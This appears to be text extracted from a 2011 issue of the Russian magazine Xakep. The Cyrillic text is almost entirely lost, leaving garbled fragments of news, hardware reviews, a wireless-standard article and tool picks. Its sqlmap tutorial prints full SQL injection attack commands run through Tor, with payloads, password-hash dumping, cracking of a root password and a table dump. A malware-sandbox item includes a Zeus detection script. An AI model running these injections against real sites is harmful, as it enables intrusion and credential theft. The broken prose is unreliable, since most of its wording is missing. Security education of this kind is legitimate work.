Вы находитесь на странице: 1из 148

SQLMAP: SQL-

028

x 10 (153) 2011

802.22:

WWW.XAKEP.RU

10 (153) 2011

: 210 .

DEFCON:
034

3D- $30
058

MICROSOFT

066

DEFCON

052

153

DEFCON CTF 2011


.
,
.

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

MALWARE SYN/ACK
UNIXOID PSYCHO

PHREAKING
PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

Step (step@real.xakep.ru)
Ant (antitster@gmail.com)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

Intro

: 24
, 100% !
:
, , .
,
.
: ?.
: 4 -
.

. ,
:
- .
, .
, , ,
. :
-, xakep.ru, ,
.
DEFCON 19
,
CTF. ,

, whitehat-, .
nikitozz, . .
vkontakte.ru/xakep_mag

10 /153/ 2011


.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)

(birarova@glc.ru)
( )
(tatarenkova@glc.ru)

(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011

001

Content

MEGANEWS
004
011


hacker tweets
-

MALWARE
078
082

FERRUM
016
020

!
80 PLUS Gold

WEXLER.BOOK T5002

088
094

PCZONE
022
027
028

032
033
034

802.22: White Space



WWW2
web-
Sqlmap, SQL-

SQL-
Proof-of-Concept
Linux


3D- $30
3D-

PHREAKING

098
100
104
109

042
046
052
058
062
066
070

076

Easy-Hack



DEFCON CTF
-


-

?
8

local/remote file include

X-Tools

10 /153/ 2011


IRP-

kernel- Mac OS X
JavaScript
Node.js

UNIXOID
112
118



300

,
-
Virus Free Man

122
038


SPYEYE

?

,
,

MegaFAQ Android OS
3.0
Linux kernel 3.0:

SYN/ACK
128

132
136





Linux
Drupal
.

140
143

FAQ UNITED
FAQ

8,5

003

MEGANEWS
TOPIARY . ?
, , LULZSEC

6452
,
The 077 (Hamdi Hacker).

.



- !
,
: , , ,
- .
: ,
, .
!
Cobra Tag, Bluetooth GPS,
Cobra Tag, , .
, , .
,
, .
: , ,
,
. ,
. -
. , 60 !


,

Topiary.



-

LulzSec , . ,
, . 27
18- , ,
, - Twitter
Topiary. .
? . , DdoS- .
, ,
750 000 , NHS,
.
. , LulzSec Exposed , LulzSec.
, (pastebin.com/kfi3Ticq) ,
Topiary ,
, . ? ,
. ,
.

BLACK HAT 2011


:
Anonymous LulzSec
?.
36 % ,
, 64 % ,
.

004

-
Amazon EC2
(Reddit, Netflix . .)
30 .
, -
Amazon !
.


Twitter
1 , .
6,4%

.

30 MSDOS
Microsoft. 30
, 12
1981 ., IBM PC 5150.

PAYPAL

!

! .

10 /153/ 2011

>> coding

MEGANEWS

TWITTER . Twitpic.com .

METASPLOIT
HD MOOR




- (
).
, ,
,
. ,
, . , ,
, ,
.

.
, ,
.
. , .

, -
.
,
.
, :
27 % .
-.

Rapid7
Metasploit Framework 4.0. , , 3.0 2007 .! ,
.
Metasploit ,
. ,
200 ,
.
.
, Metasploit Framework 4.0
3.x-.
DEP ASLR. msfgui GTK Java,
ASCII-. ,
, , Rapid7 , Metasploit 4.0
, .
,
.

GOOGLE MOTOROLA
( ) 12,5
.
Motorola Mobility
,
Android.
2011 2012
. Motorola
Google.

006

716
361
68


Metasploit.
Metasploit
BSD

-
FIREFOX 7
Android.

2050% ,
.

/4
Windows XP,
Avast. 74%
.

10 /153/ 2011

MEGANEWS

83% GOOGLE+ , Bime Analytics.

SAMSUNG GALAXY XCOVER


, ,


, ,

. , ,

Ericsson R310s
. Siemens ME45...
,
, , : ,
. , , , ,
. , ,
. . Samsung , Android Galaxy Xcover (GT-S5690)
. IP67,
,
1
. , Xcover
, Samsung
.
Galaxy Xcover Android 2.3
Gingerbread .
, 135 , 12 .
3,65 ,
, 45 . Galaxy Xcover
800 , 150 -,
microSD, Wi-Fi 802.11n
Bluetooth 3.0, GPS HSPDA.
3 , ( ), FM-, USB 2.0, 3,5- 1500 .
, Galaxy Xcover
, - .
, . ,
2800 , 12,7 . .
, Android . Motorola Defy Sony
Ericsson Xperia Active.

Samsung Galaxy Xcover Samsung Social Hub,


,

XP



WINDOWS XP

50%
49,69%
008

10 /153/ 2011

-

.
, !

Abuse-
( ).


( $5000).

DDoS
( ).


( ).

.

.

Double VPN-

( ).


SMS .


,
.

socks-
( ).

10 /153/ 2011

009

MEGANEWS

ANDROID-

GPRS

,
. ,
(
) GSM-,
,

15 .
Security
Research Labs
GPRS. , GPRS
-
. , T-Mobile, O2 Germany, Vodafone,
GPRS.
GPRS ,
, , ,
. , , 128
. , , ,
,
,

. ,
.
. Chaos Communication
Camp 2011, ,
GPRS, GPRS-,
.
:
,
GPRS
. ,
5 !
,
GPRS,
, .
. ,

. Chaos
Communication Camp ,
. , ,
.

70%
,

,
,

2011 .


.

Android OS

,
Android, CA Technologies.
, , . ,
, , ,
ARM, shangzhou/callrecord
(SDCard). , . , ,
, , . CA Technologies,
. , :
,
,
. , , ,
.

010

10 /153/ 2011

#hacker tweets
. . , . ,
(@asintsov) .

@ChrisJohnRiley:
@google,
,
,
... G+ ,
!

@SecurityHumor:
Google+ CAPTCHA:
, .
,
, ,
" ".

@0xcharlie:
.

!
15% . RSA , ...
:

RSA. ,
.

@nickdepetrillo:
, ,


.

@VUPEN:
Java 7 . ASLR, , ASLR Java
ROP . Oracle/Sun!

10 /153/ 2011

@taviso:
Adobe 400 ,
APSB11-21

. .
: 400! .
, , 50 %
, . , , bit.ly/qjJzZD.

@stephantsov:
! ! ,
IV! ,
#defcon!
:
, ( ,
Defcon CTF
). , !

@pentestit:
SSL- ! http://bit.ly/o8jSrT.
@todb:

, - ,
.

:
,
! .

@str0ke:

packetstormsecurity.com +
exploit-db.com + FD + Daily
@xme:
...
! !

@kevinmitnick:
!!!
: , ,
,
, ,
! .

@frbbs:
J 50 .
, ,
,
Nessus CISSP . http://t.co/PehrnZn.

Dave + metasploit's changelog


.
:
, (@str0ke) .
, , .

@41414141:
! Cisco
TelePresence [...]
root [ ],
.
http://t.co/xjW27eW.

@0xcharlie:
! 010 Editor
Mac OS X.
!

011

MEGANEWS

22 APPLE , Apple Store.

EDIFIER C5

2.1 2.1+

Edifier
,
C5.
2.1 2.1+
( ). 8-
c 3.5- 3/4-
.

FM-, USB- SD-.
, MP3, WMA
& PCM
.
:
: RMS 9W x 2 + 35W x 1 (THD=10%)
-: 85 (A)
: 0.5%
: 10 Ohm
: 8 (210 ), , 4 .
: 3.5 (92 ), , 4 .
: 13 , , , 4 .
: 35 .

, , . AntiSec ,
.
77 -,
, ,
. ,
. ,
10
,
7000 .
, , ,
,
. ,
.
, ,
( ,
). , ,
14 ,
,
PayPal. ,
.


MOZILLA.
Mozilla
,

Boot
to Gecko.
Gecko,
Mozilla:
Firefox Thunderbolt.
Boot to Gecko
-,

HTML5.

012

-
Pastebin

BART (Bay
Area Rapid Transit).
,
100
.
, ,
Anonymous

3

Google,
400 .

,

,
Facebook, Twitter
MySpace, Sophos.

10 /153/ 2011

MEGANEWS

FACEBOOK

IPAD 3 , DigiTimes.


?


. ()
()
arxiv.org/abs/1107.2031
, , , ,
. ,

. Stegobot, ,
( ,
), .
,
, Stegobot ,
- , ! ,
Facebook JPEG- 720720
( Facebook )
50
. ,
Stegobot, .
Facebook , .

Stegobot
Flickr. 7200 ,
.

. .
, . ,
,
.

Facebook

,
...

,
Facebook .
, . , Security Bug Bounty.
, , ,
. ? .
500 , Facebook
.
, , , . Facebook .
, XSS-, CSRF/XSRF,
. ,
,
Facebook, , .
, Facebook
. , .
, Mozilla 3
. , Google 3133,7. , , 300 000 . -
.

40%
50 000 USB, 20%
100 000 .

2,5 !
10 /153/ 2011

(facebook)

013

MEGANEWS

DEFCON CTF. . 52

DEFCON 19

GOOGLE APPLE/MICROSOFT

-

- DEFCON. ,
, , ,
.
.
?
,
(whitehat)
Capture The Flag. ,
DefCon
Kids, 8 16 ,
, .
, Google .
. , defcon.org. . ,
HBGary, ,
HBGary, ,
.
Whoever fights
monsters: confronting Aaron Barr, Anonymous and ourselves
LulzSec, Anonymous,
.

,
Android
.
Microsoft
Samsung Barnes & Noble, Apple HTC Motorola
.
( , -,
), Google
. Google , Microsoft, Apple Oracle
Android ,

. , ,
Android, . , Google

Android .
, Google
Android. ,
, Apple
Samsung Galaxy Tab
10.1 (,
).



Adobe, Flash

, -
-
, HTML5,
CSS3 JavaScript. Adobe
Edge , ,

Adobe Labs.

014

1000



Google
IBM,

.

,


-
Samsung.
Cyanogen
CyanogenMod.

Apple
,
,
2011 .
Steve
Jobs: A Biography.

10 /153/ 2011

MEGANEWS

ANDROID 2.3 (GingerMaster) Android Marketplace.


,

BlackHat
Wireless Aerial
Surveillance Platform ( ). , , ,
WiFi-.
-23, Via Epia Pico ITX
PC (500 Via C7, 1 RAM Backtrack 4 ) ArduPilot.
PPP-over-SSH. .
,
14 (6,35 ) 6 (183 ). Via Epia PX5000EG Pico
ITX PC (500 Via C7, 1 RAM), Linux BackTrack 5.

340 . WASP , WiFi-.
4G-, , ,
Google Earth
. , ,
VPN ,
.
GSM-. GSM-
4G VoIP. ,
. SMS
, 32 .
,
15 .
400 (122 ), , ,
20 000 (6096 ).
-: . ,
, , ,
.
- rabbit-hole.org.
, , Black Hat 2011
DEFCON 19, , . , ,
. ,
.

,
1300 .
, : 6190

XSOUND WINSTON XS
WinstonXS XSoundBar openair-
Winston Global Gathering Freedom Music,
16 2011
-. 30 000
,
.
XSoundBar
. ,


, chillout-,
3D-mapping,
DVJ.
Winston Global Gathering
Freedom Music XSound
.
XSound

,
www.winstonxs.ru.

FERRUM

!

80 PLUS GOLD

? , , , ,
? , . , .
.
, ,
SLI CrossFireX. : .



D-RAM DBS-2200 FSP. ,
,
, ,

.
850 .
.
+12V
, 100 .

+3,3V +5V 20 .

016

, .
+12V 200
. .
:
+3,3V, +5V, +12V.
, : ,
. : ,
,
.


:
Cooler Master Silent Pro Gold 700W
Corsair Professional Series Gold AX750
ENERMAX MODU87+ 800W
FSP AURUM GOLD 600
FSP AURUM GOLD 700
Thermaltake Toughpower Grand 750W

10 /153/ 2011

COOLER MASTER SILENT


PRO GOLD 700W
Silent Pro Gold 700W
Cooler Master.
80 PLUS.
20+4- ,
4+4- 6- .
,
, - , , .
Silent Pro Gold 700W 700 , +12V 56 (672 ).
120 . Silent Pro Gold 700W .
+3,3V
1%, +12V +5V 2%. ,
, ,
. , .

5200

5000

CORSAIR PROFESSIONAL
SERIES GOLD AX750
rofessional Series Gold AX750
, .
,
: , . AX750 (
), , .
(SATA Molex) ,
Cooler Master.
-
. AX750
750 62 (744 )
+12V. 120 .
AX750 .
2 % .
AX750 ,
20%, 20 50%
100% ,
.


,
20%
10 /153/ 2011

017

FERRUM

ENERMAX MODU87+ 800W


ODU87+ 800W ENERMAX.
. , , .
: , ,
, , ,
CordGuard,
, . MODU87+
800W 4 +12V, 30 ,
792 . .
: 12%, . +12V,
. 140 ,
. ,
- ,
.

7900
.

FSP AURUM GOLD 600


,
.
: , , , FSP. :
150 , . FSP AURUM GOLD 600,
, 600 , 90 %,
80 PLUS Gold. 4
+12V 18 .

. , , , +5V,
4%. .
, , .
. ,
.

3100
.

Cooler Master
Silent Pro Gold
700W

Corsair Professional
Series Gold AX750

700
90 %

+3,3V-22 , +5V-25 , +12V- 56 ,
-12V- 0,3 , +5Vsb -3,5
+3,3V & +5V-150 , +12V- 672

750
90 %

+3,3V -25 , +5V-25 , +12V-62 ,
-12V -0,5 , +5Vsb -3
+3,3V & +5V -125 , +12V -744

PFC

120
160 x 150 x 86
3,3

120
160 x 150 x 86
3,3

:
:
+12V

018

ENERMAX
MODU87+ 800W

800
93 %
4
+3,3V-24,+5V-24,+12V1-V4-30,
-12V-0,5,+5Vsb-3
+3,3V & +5V - 120 , +12V1
& +12V4 -792

140
175 x 150 x 86
2,9

10 /153/ 2011

FSP AURUM GOLD 700


AURUM GOLD 700 FSP
,
, , .
- , ( ),
- . AURUM GOLD 700

6+2 pin, SATA Molex,


FDD. 700 , +12V
, , 18 , +3,3V +5V
28 . 120 . AURUM GOLD 700 ,
, .
3% . :
. ,
: - .

3700
.

THERMALTAKE
TOUGHPOWER GRAND 750W
hermlatake Toughpower Grand 750W
, ,
. 180 ! Toughpower Grand 750W, ,
: , ;
; ; , - , 4 ,
, , .
Toughpower Grand 750W . 750 , +12V 720 .
140- ,
. ,
: Toughpower Grand 750W , ,
. , 2 %
, +5V .

5300
.

FSP AURUM
GOLD 600

600
90 %
4
+3,3V-24,+5V-24,+12V1-V4-18,
-12V-0,5,+5Vsb-3,5
+3,3V & +5V -140 , +12V1
& +12V4 - 540

120
150 x 140 x 86
1,9

10 /153/ 2011

FSP AURUM
GOLD 700

700
90 %
4
+3,3V-28,+5V-28,+12V1V4-18,
-12V-0,5,+5Vsb-3,5
+3,3V & +5V -160 , +12V1
& +12V4 - 672

120
150 x 140 x 86
1,9

Thermaltake
Toughpower
Grand 750W

750
92 %

+3,3V-25,+5V-25,+12V-60,
-12V-0,8,+5Vsb-3
+3,3V & +5V - 150 ,
+12V -720

140
180 x 150 x 86
2,5


ENERMAX
MODU87+ 800W. , ,
,
. , , , .
, ,
. ,
80 PLUS Gold,
FSP FSP AURUM GOLD 700. ,
700 , , . z

019

FERRUM


WEXLER.BOOK T5002

2500
.

:
: 5 , 800 480 ,
, , LED-
: 4
: 32 microSD
: TXT, PDB, HTML,
PDF, FB2, EPUB
: MP3, WMA, FLAC, AAC
: JPEG, BMP, GIF
: WMV, RM, AVI, RMVB,
3GP, FLV, MP4, DAT, VOB, MPG, MPEG,
MKV, MOV
: USB 2.0, audio-out
: FM-, ,

: 148 90 11
: 285
: ,
mini-USB > USB,

020

,
, . -
-
. :
, , FM-,

.
WEXLER.BOOK T5002, .
W

WEXLER

.
.
.
, .

WEXLER.BOOK T5002 ,

e-ink:


. :


,
. FM-

.
MP3,
FLAC ACC. , (4 ),
microSD.

:

, -
.
WEXLER.BOOK T5002
,
.
,

, .
: mini-USB
.


,
.
, -
. ,
-, , ,
. ,
, ,
,
.

WEXLER.BOOK T5002 ,

. ,
-, . , ,
.
WiFi - . ,
,
,
e-ink, LCD-
.

, WEXLER.
BOOK T5002 .

.
.
.

10 /153/ 2011

Preview

31 .
.

58


,
, IT-
,

?
Waledac, Rustock, CoreFlood

- ,

Microsoft. ,

, ,
.


,
.

PC ZONE

34

3D- $30
, -
3D- ?
.

MALWARE

82



?

, .

10 /153/ 2011

66



Windows
. 8
.

94



IT-. ESET

.

70


local/
remote file include .
,
.

UNIXOID

118

ANDROID:
, , ,
,

MegaFAQ'.

021

PC ZONE

TGX (korikov_sibsuti@mail.ru)

802.22:
White Space



,
Wi Fi, WiMAX LTE?
,
100
22 /.

022

WWW

IEEE 802.22


802.22: www.ieee802.
org/22.

2011 . (Institute of Electrical and Electronics Engineers)


IEEE
802.22, white space ().
: /- (54862 ) .
,
,
. ?
,
, .
,
( GPS), ,
.
.

INFO


IEEE
802.22 WG
Carlos Cordeiro,
Kiran Challapali
and Dagnachew
Birru IEEE 802.22:
An Introduction to
the First Wireless
Standard based on
Cognitive Radios.

10 /153/ 2011

802.22: White Space

, IEEE 802.22 WRAN , . ,



.
22 / 100 !



(Wireless Regional Area Network, WRAN). .
-
, .
, Wi-Fi, WiMax LTE . .


54 862 , .
,
6 ,
8 , 7- , ,
. 802.22
6 (8,7) .


. .
/ :
( ) .

NTSC (, , ), PAL (), SECAM (, ,
) (, . .)
( . .).
, ATSC/DVB-T
, !

(coexistence) , ,
.

, ( ) ().
.
,
30 4 .
,
.
.
.
(
, ). ,
(sensing) .
GPS-.
IEEE 802.22 , IEEE 802.16 (WiMax), . , 802.22 . .
, 802.22 ,

.



IEEE 802.22 , .
, PHY- (Physical) MAC- (Media Access
Control) OSI , .



,
.
(sensing) .
.
.
,
,
.
.

.

.

, ,
.

.
GPS-.
NMEA
0183. ,
GPS.

10 /153/ 2011




(Time Division Duplexing, TDD).


802.22
III, 1999 . . , cognitive radio ( ),

. ,
. . 2004 .
(Federal Communications Commission)
,
,
. 2004 . IEEE ,
802.22
.
IEEE 802.22 2011 .

023

PC ZONE

WHITE SPACE
DS-

CBP \

US-

1 = 6

FCH

USC

DC map

6
3

US map

7
3

N+1

1 = 10

WRAN
100

WHITE SPACE

SCH

WWAN
15

Wireless Wide Area Network

1 = 6

Wireless Regional Area Network

WMAN
5

Wireless Metropolitan Area Networks

WLAN
150

Wireless Local Area Network


N

N+1

WPAN
10

1 = 160

Wireless Personal Area Network

1 GP=GPS
GL=
2

3 A , V
4
5 N=, S=
6
7 W=, E=
8

9
10
11
12
13 :
A =
D =
E =
N =
14
15 <CR> = 0x0D <LF> = 0X0A

QPSK

16-QAM

64-QAM

NMEA 0183
( , ) .
GPS-,
1

10

11

12

13

14

15

$ G P R M C , h h m m s s . s s , A ,G G M M . M M , P, g g g m m . m m , J,v.v, b b , d d m m y y, x . x , n , m* h h < C R > < L F >

024

10 /153/ 2011

( )

RMC-


802.22: White Space

,
. ,

.
802.22 -
(Orthogonal Frequency Division Multiplexing, OFDM).
WiMax. , .
.
: (Quadrature Phase Shift Key, QPSK),
16 64 (Quadrature
Amplitude Modulation, 16 QAM 64 QAM). , . . , (
).
, , 16 QAM
, QPSK.
,
.
OFDM
. - .
.
,
,
. OFDM ,
.
802.22 , .
(Gallager),

.

-
(Orthogonal Frequency Division Multiple Access, OFDMA).
, . OFDMA , WiMax LTE. OFDM
.
0,624 3,12 //.
. ,
,
.

(channel bonding). ,
18 (21, 24)
.

, .

. /-
(
) . ,
IEEE 802.22 , .

, .
802.22
(superframe). 160 .
(preamble) (superframe
control header, SCH).
.
, , . ,
SCH
. (frame). 10 ,
16 .
.
802.22 ,
. ,
. ,

. SCH
. SCH ,
. ,
.
.
,

. ,
,
, , .
, .

. .
,
. ,
. .

MAC-
(Media Access Control) . MAC,
,

10 /153/ 2011

:
.
: ,
.
:
114 /.
: (Point-to-Multipoint).
: 10100 (
).
: 4 (
, EIRP).
: (
) ,
; ,
( ).
: GPS ( ).

025

Wi-Fi
802.11n

UMTS (3GSM)

WiMax

LTE

802.22

UMTS/W-CDMA

802.16d

LTE

802.22

802.11g

Wi-Fi
.

. 802.11
. Wi-Fi
Wireless Fidelity (
).


,
3G. UMTS

Universal Mobile Telecommunication System.

, 3.9G. WiMax

.

Worldwide Interoperability
for Microwave Access
( ).



CDMA-UMST-.


UMTS-. LTE
3.9G-.
LTE Long Time
Evolution ( ).

802.22
,



.



.

Wi-Fi-
.


.


.

UMTS

3G-.

UMTS,
: HSPA, HSPA+,
HSDPA. 3.5G-.

WiMax
Wi-Fi,
(WMAN).

DSL-.
,
,
Wi-Fi.

LTE .
().
(Yota)


LTE
.

,

.

(
)

38140

46

5100

30100

2,4

2,4 5

18852025
21102200

211

7004000

54862

Ma

54 /

600 /

2 /c

75 /

173 /

23 /

20

2040

1,2520

1,420

624

TDD

TDD

FDD

FDD/TDD

FDD/TDD

TDD

CSMA/CA

OFDMA

W-CDMA

OFDMA

OFDMA/SC-FDMA

OFDMA

MIMO

2003

2009

2001

2004

2009

2011

70250

?
IEEE 802.22, ,
,
. ,
, 802.22
.
,

026

,
. , ,

.
, ,
,
. . z

10 /153/ 2011

PC ZONE

WWW2
ENCIPHER.IT
encipher.it

( , ) : : Gmail, Facebook .
? ,
JavaScript, AES 256.
,
. ,
, , Gmail. , .
, ,
.

BTDIGG
BTDigg.org

-,
. BTDigg BitTorrent, . DHT-! ,
BitTorerent- . , -, ()
. . magnet-, 160- . BTDigg
DHT- -,
-. : @name (
), @content ( ).

IDEONE
ideone.com

DHT

,
ideone, . , 40 . ,
. /C++, Java, C#,
Assembler, Objective C, ( Python) .
: 10 , 15 ( , 5) , 256 . ,
. API,
.

TAGBEEP
tagbeep.com

- , . tagBeep. - . TagBeep , . ,
, , .
, , (, 10 ). TagBeep
,
( , ). SMS-,
, , .

10 /153/ 2011

027

PC ZONE

(miroslav.stampar@gmail.com)

Sqlmap,
SQL-




SQL-
INFO
.
(@stamparm), , (@inquisb), ,
. 2006 .
(@belch), - , 2009 . .

, sqlmap?
,
SQL-
. sqlmap
SQL-,
. , sqlmap
, .
,
:
,
( ). . ,
(
DBMS), ()
. -
SQL-.


SQLMAP?

UNION query SQL injection

028

SQL-,
sqlmap:
UNION query SQL injection.
SQL-, ,
UNION ALL SECECT. ,
-
SELECT : for ,
. Sqlmap ,
(Partial UNION query SQL injection).
Error-based SQL injection.

, HTTP- ( ) DBMS,
-
. , - - (
) DBMS.
Stacked queries SQL injection. ,
- , , , HTTP- (;)

10 /153/ 2011

Sqlmap, SQL-

Boolean-based blind SQL injection

SQL-.
SQL-, SELECT, ( INSERT DELETE). ,
/
, .
, -
, .
Boolean-based blind SQL injection.
: .
. Sqlmap HTTP ,
SELECT (
).
HTTP- headers/body
,

SQL-.

true- ( ).
, sqlmap ,
HTTP. ,
,
( unicode).
Time-based blind SQL injection. .
,
. , DBMS
(, SLEEP() BENCHMARK()). ,
,

SQL-: ?
SQL- , -,
SQL-
(, $query="SELECT *
FROM users WHERE id=".$_REQUEST["id"]).
SQL- ,
. fingerprinting ,
(
users). , , ,
- - (,
).

10 /153/ 2011

.
. , ,
- .

,
. SQL-
, ][ SQL Injection: (bit.ly/pBSNVA).
, DBMS
. sqlmap
MySQL, Oracle, PostgreSQL, Microsoft
SQL Server, Microsoft Access, SQLite, Firebird, Sybase SAP MaxDB.

SQLMAP
SQL- ,
- sqlmap.
, ,
. , sqlmap :
, , .
.
, .
.
, (
), (users)
(pass).
, , ,
- MySQL, MySQL,
PostreSQL Microsoft SQL Server.
,
, .
( SQL-)
DMBS,
IP-, .
TCP- ( out-ofband) ,
.
(), Meterpreter
VNC-.

getsystem Metasploit, , , kitrap0d (MS10-015).
:
, . !

029

PC ZONE

. ,
sqlmap. ,
, OWASP (www.owasp.org),
. ,
sqlmap Python, ,
.
. ,
LAMP (Linux/Apache/MySQL/PHP)
-.
1
, ,
GET- id -,
http://www.site.com/vuln.php?id=1 ( URL -u).
,
( --random-agent), TOR- (--tor). , sqlmap:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1"
--random-agent --tor
sqlmap/1.0-dev (r4365) automatic SQL injection
and database takeover tool

17 HTTP(S)-. , , .
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind WHERE or HAVING clause
Payload: id=1 AND 1826=1826
Type: error-based
Title: MySQL >= 5.0 AND error-based WHERE or HAVING clause
Payload: id=1 AND (SELECT 8532 FROM(SELECT COUNT(*),CONCAT(
CHAR(58,98,116,120,58),(SELECT (CASE WHEN (8532=8532) THEN 1
ELSE 0 END)),CHAR(58,98,121,102,58),FLOOR(RAND(0)*2))x FROM


, -
SQL-, , SQL-. , PHP

$query="SELECT name, description, comment FROM catalogs WHERE
catid=".$_GET["catid"]. , GET catid
SQL . , URL
http://www.site.com/vuln.php?page=front&catid=-1
UNION ALL SELECT database(),current_user(),version()&uid=0,
,
.

INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


Type: UNION query
Title: MySQL UNION query (NULL) 3 columns
Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,98,116
,120,58),IFNULL(CAST(CHAR(74,76,73,112,111,113,103,118,80,84) AS CH
AR),CHAR(32)),CHAR(58,98,121,102,58))
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(10)
, , , -:
[02:01:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
:
[02:01:45] [INFO] Fetched data logged to text files under '/opt/
sqlmap/output/www.site.com'
2
. ,
fingerprinting (-f)
(--banner) , , ,
(--current-user). , (--passwords) (--tables),
, (--exclude-sysdbs)
. , :
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1"
--random-agent --tor -f --banner --current-user --passwords
--tables --exclude-sysdbs
,
:
[02:08:27] [INFO] fetching banner
[02:08:27] [INFO] actively fingerprinting MySQL
[02:08:27] [INFO] executing MySQL comment injection fingerprint

Error-based SQL injection

030

web application technology: PHP 5.2.6, Apache 2.2.9

10 /153/ 2011

Sqlmap, SQL-

back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
comment injection fingerprint: MySQL 5.1.41
banner parsing fingerprint: MySQL 5.1.41
banner: '5.1.41-3~bpo50+1'
:
[02:08:28] [INFO] fetching current user
current user: 'root@localhost'
- :
[02:08:28] [INFO] fetching database users password hashes
do you want to perform a dictionary-based attack against retrieved
password hashes? [Y/n/q] Y
[02:08:30] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[02:08:32] [INFO] using default dictionary
[02:08:32] [INFO] loading dictionary from
'/opt/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] N
[02:08:33] [INFO] starting dictionary-based cracking (mysql_passwd)
[02:08:35] [INFO] cracked password 'testpass' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *6B2C58EABD91C1776DA223B088B601604F898847
[*] root [1]:
password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
clear-text password: testpass
! root (
). :
[02:08:35] [INFO] fetching database names
[02:08:35] [INFO] fetching tables for databases:
information_schema, mysql, owasp10, testdb
[02:08:35] [INFO] skipping system databases:
information_schema, mysql
Database: owasp10
[3 tables]

?
SQL-
SQL-.
, PHP PEARs DB
(pear.php.net/package/DB),
SQL-.
: $p = $db->prepare("SELECT * FROM users WHERE
id = ?"); $db->execute($p, array($_GET['id'])). , ,
SQL- ,
SQL- (
). , ,
(, intval()) , mysql_real_escape_string() addslashes(),
. ,
, , .

10 /153/ 2011

+--------------+
| accounts
|
| blogs_table |
| hitlog
|
+--------------+
Database: testdb
[1 table]
+-------------+
| users
|
+-------------+
[02:08:35] [INFO] Fetched data logged to text files under '/opt/
sqlmap/output/www.site.com'
!
3
, testdb- (-D testdb) users (-T users), , ,
(--dump).
, , SQLite
(--replicate).
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1"
--random-agent --tor --dump -D testdb -T users --replicate

users :
[02:11:26] [INFO] fetching columns for table 'users' on database
'testdb'
[02:11:26] [INFO] fetching entries for table 'users' on database
'testdb'
Database: testdb
Table: users
[4 entries]
+----+--------+------------+
| id | name | surname
|
+----+--------+------------+
| 2 | fluffy | bunny
|
| 3 | wu
| ming
|
| 1 | luther | blissett |
| 4 | NULL | nameisnull|
+----+--------+------------+
[02:11:27] [INFO] Table 'testdb.users' dumped to sqlite3 file
testdb.
sqlite3 SQLite. ,
,
, SQLite (, SQLite Manager).

Proof-of-concept
DSSS, Python-,
SQL-. , , ,
100 . ,
SQL- .
.
sqlmap,
,
SQL-,
. z

031

PC ZONE

Proof-of-Concept
LINUX

, , . bellard.org/jslinux,
, Linux-,
, . ,

. , PC, JavaScript
! TinyCC. !
? ,
. JavaScript PC Emulator (
)
QEMU. ,
. PoC .


? ?
Unix-
.
JS/UIX (www.masswerk.at/jsuix),

Unix-.

JavaScript . , JS-

Linux.

?
,
(QEMU).
JavaScript PC Emulator , . , ,
, ,
.
JavaScript, JS-. , Jaeger Monkey,
Firefox 4, V8 (Chrome).
, ,
Jaeger Monkey
( -. .
).

JavaScript PC Emulator Firefox

032

,
, x86. (
, , ), .
: CPU c RISC- (-
MIPS ARM),
x86 .

, Linux.
,

( Firefox Chrome).
,
,
.
. z

10 /153/ 2011

PC ZONE

(twitter.com/stepah)


. , . -,

.
: , ,
,
.
PCAP-.

, ,
. , ,
.
Joe Sandbox Web (www.joesecurity.org) ,
-,
, .

, .
PE- , winsocket-
, , ,
, ,
.
. .
, ,

. : -,

10 /153/ 2011

,
, sleep (
2 ), . Joe
Sandbox Web 160 .
.
,
Python- .
Zeus,

:
zeusfiles = ["c:\\windows\\system32\\ntos.exe", \
[... ...]
"c:\\windows\\system32\\lowsec\\user.ds"]
def sigmatch(data):
if data["func"] == "fileCreated":
if data["status"].find("success") != -1:
# , -
for zeusfile in zeusfiles:
if data["path"].lower() == zeusfile:
zeusdetected = True
elif data["func"] == "http":
if zeusdetected:
# IP- C&C-
if re.match( r"POST.*gate\.php", data["request"], re.I):
zeusservers.append(data["dstip"])
Joe Sandbox Web
. -
AutoIt-, ,
. ( ,
, ).
:
. ,

. .
,
, , .
: ,
. Joe Sandbox Web.
, .

. , . z

033

PC ZONE

3D-
$30


3D-

3D-,

,

,
.
, -.
.
034

WWW
www.davidlaserscanner.
com
.
!

,
,
,

.

3D-
.
3D- ( 3D)
,
, , , , . , ,
: ,
. . ,
-,
, .
, -
-,
. .
, .
,
. ,
,
- . ? , , 3D-! :
. , !
( ), ,
3D- . ,
. ,
. , ,
. ,
3D- . , , .

10 /153/ 2011

3D- $30


?
3D-, ,
:
, , -,
.

,
, ,
. , , ,
/
: -
